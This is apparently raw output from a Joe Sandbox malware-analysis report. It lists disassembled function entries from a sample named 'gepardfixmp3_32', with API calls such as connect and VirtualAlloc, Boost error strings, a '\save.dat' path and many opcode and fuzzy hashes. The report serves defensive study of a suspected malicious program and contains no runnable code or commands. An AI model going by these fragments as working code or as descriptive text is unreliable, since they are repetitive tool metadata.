                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLastgetsockname
                                                            • String ID: &'
                                                            • API String ID: 566540725-655172784
                                                            • Opcode ID: ef162cf9e05745a1116896379ebcaca87477f7f4337577eda007a8382ac2e3b3
                                                            • Instruction ID: 6ef8dc28730f3b2f01fed5ce038b70e2af0e02bae1edf90229fb08c74e4900b1
                                                            • Opcode Fuzzy Hash: ef162cf9e05745a1116896379ebcaca87477f7f4337577eda007a8382ac2e3b3
                                                            • Instruction Fuzzy Hash: 06215176A00258DFDB10DF68D844ACEF7F5FF4C324F20856AE918EB281EB30A9458B50
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 02C2CCB8
                                                              • Part of subcall function 02C2D294: std::exception::exception.LIBCMT ref: 02C2D2C3
                                                              • Part of subcall function 02C2DA4A: __EH_prolog.LIBCMT ref: 02C2DA4F
                                                              • Part of subcall function 02C33B5C: _malloc.LIBCMT ref: 02C33B74
                                                              • Part of subcall function 02C2D2F3: __EH_prolog.LIBCMT ref: 02C2D2F8
                                                            Strings
                                                            • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02C2CCF5
                                                            • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02C2CCEE
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: H_prolog$_mallocstd::exception::exception
                                                            • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                            • API String ID: 1953324306-1943798000
                                                            • Opcode ID: 930e16eba5eebc2d4e2fe78eb489f2bb4a2c3355431aedde996c7d42d6beaa90
                                                            • Instruction ID: 05f353d06f34d34617af1328e68f62dee486015af45cbf9503427774b3633e01
                                                            • Opcode Fuzzy Hash: 930e16eba5eebc2d4e2fe78eb489f2bb4a2c3355431aedde996c7d42d6beaa90
                                                            • Instruction Fuzzy Hash: BF21ADB1E00264DBDB14EFA8D914AEEBBB5EF54704F10449EE806AB240DF749A48DF91
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 02C2CDAD
                                                              • Part of subcall function 02C2D36B: std::exception::exception.LIBCMT ref: 02C2D398
                                                              • Part of subcall function 02C2DB81: __EH_prolog.LIBCMT ref: 02C2DB86
                                                              • Part of subcall function 02C33B5C: _malloc.LIBCMT ref: 02C33B74
                                                              • Part of subcall function 02C2D3C8: __EH_prolog.LIBCMT ref: 02C2D3CD
                                                            Strings
                                                            • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02C2CDEA
                                                            • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02C2CDE3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: H_prolog$_mallocstd::exception::exception
                                                            • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                            • API String ID: 1953324306-412195191
                                                            • Opcode ID: 0997081a8dc348d0f63f1bd907cf319e6dfaef902ea4c573407cc947cadbe21d
                                                            • Instruction ID: 32c1412cef4533aca3ad6038fe9cc033304209f893b42a6782c2d806cbf7c8dc
                                                            • Opcode Fuzzy Hash: 0997081a8dc348d0f63f1bd907cf319e6dfaef902ea4c573407cc947cadbe21d
                                                            • Instruction Fuzzy Hash: 77219EB1E00268DADB14EFA4D914BAEBBB5EF54704F00055DE80AAB240DF709A48DB91
                                                            APIs
                                                            • WSASetLastError.WS2_32(00000000), ref: 02C22AEA
                                                            • connect.WS2_32(?,?,?), ref: 02C22AF5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLastconnect
                                                            • String ID: 3'
                                                            • API String ID: 374722065-280543908
                                                            • Opcode ID: 675ada50a317fad6555db86c3b64d4906d3062e1fca4bbe7789e72cd512b0ef1
                                                            • Instruction ID: bb98cf40f211fd360b80b02e32269c856e4f3a45d3563521535f91ccac0bae85
                                                            • Opcode Fuzzy Hash: 675ada50a317fad6555db86c3b64d4906d3062e1fca4bbe7789e72cd512b0ef1
                                                            • Instruction Fuzzy Hash: B921C975E10214ABCF10EFB4D4146EEBBBAEF84328F004599DC1997280EF7456099F92
                                                            APIs
                                                            • _malloc.LIBCMT ref: 02C2535D
                                                              • Part of subcall function 02C32FBC: __FF_MSGBANNER.LIBCMT ref: 02C32FD3
                                                              • Part of subcall function 02C32FBC: __NMSG_WRITE.LIBCMT ref: 02C32FDA
                                                              • Part of subcall function 02C32FBC: RtlAllocateHeap.NTDLL(009B0000,00000000,00000001), ref: 02C32FFF
                                                            • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 02C2536F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateFolderHeapPathSpecial_malloc
                                                            • String ID: \save.dat
                                                            • API String ID: 4128168839-3580179773
                                                            • Opcode ID: 8fa661cb2a92033391a8a64e98f879a050f9521576cd308fc70b4ddbd3541b49
                                                            • Instruction ID: a8ca9a9316f087cb41bb90df0ddf17e1ef7a0dac7e39735e598993ed839a883f
                                                            • Opcode Fuzzy Hash: 8fa661cb2a92033391a8a64e98f879a050f9521576cd308fc70b4ddbd3541b49
                                                            • Instruction Fuzzy Hash: 85117D729042546BDB268E658D80A6FFF6BDFC2690B1001ACEC496B201DBA30E06C6A0
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 02C2396A
                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02C239C1
                                                              • Part of subcall function 02C21410: std::exception::exception.LIBCMT ref: 02C21428
                                                              • Part of subcall function 02C2A622: __EH_prolog.LIBCMT ref: 02C2A627
                                                              • Part of subcall function 02C2A622: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C2A636
                                                              • Part of subcall function 02C2A622: __CxxThrowException@8.LIBCMT ref: 02C2A655
                                                            Strings
                                                            • Day of month is not valid for year, xrefs: 02C239AC
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                            • String ID: Day of month is not valid for year
                                                            • API String ID: 1404951899-1521898139
                                                            • Opcode ID: 7de4867ffa45d7a62bd0ce3209493293ec23f053ed167e15d2615ca98e5d7560
                                                            • Instruction ID: 67d118c13f1a121f74d989407b624c9aa24aa13ec71c9b1fdc2aba61313fbd17
                                                            • Opcode Fuzzy Hash: 7de4867ffa45d7a62bd0ce3209493293ec23f053ed167e15d2615ca98e5d7560
                                                            • Instruction Fuzzy Hash: 7401B17A910219AACF00EFA4D801AEFB779FF18B10F40401AEC04A3200EF705B49DB95
                                                            APIs
                                                            • std::exception::exception.LIBCMT ref: 02C2FB1B
                                                            • __CxxThrowException@8.LIBCMT ref: 02C2FB30
                                                              • Part of subcall function 02C33B5C: _malloc.LIBCMT ref: 02C33B74
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Exception@8Throw_mallocstd::exception::exception
                                                            • String ID: bad allocation
                                                            • API String ID: 4063778783-2104205924
                                                            • Opcode ID: 857686385c8d32e3c348cb5a45bcf638cb372d7cd36e55a849940e562e93c134
                                                            • Instruction ID: c9d2094a1cc0f97c1b55f0710602b8d4706a302f5376f1c14a845ef943d82041
                                                            • Opcode Fuzzy Hash: 857686385c8d32e3c348cb5a45bcf638cb372d7cd36e55a849940e562e93c134
                                                            • Instruction Fuzzy Hash: 9AF0A7B0A0033D66DF04EAA88C65AFFB3FD9B44318B400969E915D3680EF70FF088595
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 02C23C1B
                                                            • std::bad_exception::bad_exception.LIBCMT ref: 02C23C30
                                                              • Part of subcall function 02C324C7: std::exception::exception.LIBCMT ref: 02C324D1
                                                              • Part of subcall function 02C2A65B: __EH_prolog.LIBCMT ref: 02C2A660
                                                              • Part of subcall function 02C2A65B: __CxxThrowException@8.LIBCMT ref: 02C2A689
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                            • String ID: bad cast
                                                            • API String ID: 1300498068-3145022300
                                                            • Opcode ID: f036647b39aa71994da6fbce585e2f1da9bf57ac709795411b63ba97a5f0a2ca
                                                            • Instruction ID: c9457199c408ffbeedbf5969ce497b78d69acc881841bbb6520540f8c507ecaf
                                                            • Opcode Fuzzy Hash: f036647b39aa71994da6fbce585e2f1da9bf57ac709795411b63ba97a5f0a2ca
                                                            • Instruction Fuzzy Hash: 56F0A0729005089BCB09EF58D540AEBB779EF56315F5001AEEE0A5B240CFB29A4BDA91
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 02C238D2
                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02C238F1
                                                              • Part of subcall function 02C21410: std::exception::exception.LIBCMT ref: 02C21428
                                                              • Part of subcall function 02C28990: _memmove.LIBCMT ref: 02C289B0
                                                            Strings
                                                            • Year is out of valid range: 1400..10000, xrefs: 02C238E0
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                            • String ID: Year is out of valid range: 1400..10000
                                                            • API String ID: 3258419250-2344417016
                                                            • Opcode ID: 5167718566e8be17011cae05e42ab6e8b79c193b6f66b94dc9f24d55a9678c22
                                                            • Instruction ID: 17302d8983b14c3e002492bb597b1740dcb717e3cbf9aab86739fb2be43207da
                                                            • Opcode Fuzzy Hash: 5167718566e8be17011cae05e42ab6e8b79c193b6f66b94dc9f24d55a9678c22
                                                            • Instruction Fuzzy Hash: B8E0DF72A402249BDB14FBD8CC11BEFB7B9DB08B20F40055AE906772C0DEB12948DBD1
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 02C23886
                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02C238A5
                                                              • Part of subcall function 02C21410: std::exception::exception.LIBCMT ref: 02C21428
                                                              • Part of subcall function 02C28990: _memmove.LIBCMT ref: 02C289B0
                                                            Strings
                                                            • Day of month value is out of range 1..31, xrefs: 02C23894
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                            • String ID: Day of month value is out of range 1..31
                                                            • API String ID: 3258419250-1361117730
                                                            • Opcode ID: 83528328eda71e349b583482681b29ac3c28ea498d7bc0d4a7c18490bcf787ce
                                                            • Instruction ID: 62f441e8d8ff31496437fbe5f2319a2213e6de38576f96131f4ed8e72c07a924
                                                            • Opcode Fuzzy Hash: 83528328eda71e349b583482681b29ac3c28ea498d7bc0d4a7c18490bcf787ce
                                                            • Instruction Fuzzy Hash: 0DE0D872A4011457D714FB98CC117EFB7B9DB08B60F40055AD80577280DEB12908DBD1
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 02C2391E
                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02C2393D
                                                              • Part of subcall function 02C21410: std::exception::exception.LIBCMT ref: 02C21428
                                                              • Part of subcall function 02C28990: _memmove.LIBCMT ref: 02C289B0
                                                            Strings
                                                            • Month number is out of range 1..12, xrefs: 02C2392C
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                            • String ID: Month number is out of range 1..12
                                                            • API String ID: 3258419250-4198407886
                                                            • Opcode ID: c8e43e21c5ca4dd6223a645ef9dd3dad116c611884958095711ea44c6496f8b5
                                                            • Instruction ID: 772110d8f846d3b9e655b121d5ab5975eaa6c74a48b28f3124a4301aa13aa21f
                                                            • Opcode Fuzzy Hash: c8e43e21c5ca4dd6223a645ef9dd3dad116c611884958095711ea44c6496f8b5
                                                            • Instruction Fuzzy Hash: 82E0D872A4011897D714FB98CC117EFB7B9DB18B10F40055AD80577280DEB12908DBD1
                                                            APIs
                                                            • TlsAlloc.KERNEL32 ref: 02C219CC
                                                            • GetLastError.KERNEL32 ref: 02C219D9
                                                              • Part of subcall function 02C21712: __EH_prolog.LIBCMT ref: 02C21717
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocErrorH_prologLast
                                                            • String ID: tss
                                                            • API String ID: 249634027-1638339373
                                                            • Opcode ID: 1cb22767196efe6a59125aa21e25afdb19f8c204c396de7b866ef3bf8ba2eb28
                                                            • Instruction ID: 372d40c922d8449028884c1c1971f92e300342d060ed87d32fd583279fa2e291
                                                            • Opcode Fuzzy Hash: 1cb22767196efe6a59125aa21e25afdb19f8c204c396de7b866ef3bf8ba2eb28
                                                            • Instruction Fuzzy Hash: 92E08676D152205BC3007B78E80818FFBE49A85234F108B66ECA9932D1EF7059189BC2
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 02C23BD8
                                                            • std::bad_exception::bad_exception.LIBCMT ref: 02C23BED
                                                              • Part of subcall function 02C324C7: std::exception::exception.LIBCMT ref: 02C324D1
                                                              • Part of subcall function 02C2A65B: __EH_prolog.LIBCMT ref: 02C2A660
                                                              • Part of subcall function 02C2A65B: __CxxThrowException@8.LIBCMT ref: 02C2A689
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                            • String ID: bad cast
                                                            • API String ID: 1300498068-3145022300
                                                            • Opcode ID: d7f19aa0c2f690228142f48a0f56397fbc255c43d9aa8706b1d8e1d1a5e86daf
                                                            • Instruction ID: 7cf66929e68696216e93eea206e9b35fd1d9018ed86f6b906399898c436173e4
                                                            • Opcode Fuzzy Hash: d7f19aa0c2f690228142f48a0f56397fbc255c43d9aa8706b1d8e1d1a5e86daf
                                                            • Instruction Fuzzy Hash: 2DE0DFB1900108DBC704EF54C641BBEB775EF14304F4040ACED0A17380CF305A0ACE82
                                                            APIs
                                                            • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00404838,?,?,?,00000100,?,00000000), ref: 00404A98
                                                            • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00404838,?,?,?,00000100,?,00000000), ref: 00404ACC
                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00404838,?,?,?,00000100,?,00000000), ref: 00404AE6
                                                            • HeapFree.KERNEL32(00000000,?,?,00000000,00404838,?,?,?,00000100,?,00000000), ref: 00404AFD
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: AllocHeap$FreeVirtual
                                                            • String ID:
                                                            • API String ID: 3499195154-0
                                                            • Opcode ID: 326bc21520183113991a8339bf2de7ac4146e2f373772080d0e11da3f1adebb6
                                                            • Instruction ID: e2b6aa67baf941fda6b0a0502f281f3949fe5c10b928d307e266fea8edbc1969
                                                            • Opcode Fuzzy Hash: 326bc21520183113991a8339bf2de7ac4146e2f373772080d0e11da3f1adebb6
                                                            • Instruction Fuzzy Hash: 1E1113B0201601EFC7208F19EE85E227BB5FB857217114A3AF692E65F1D770A845CB4C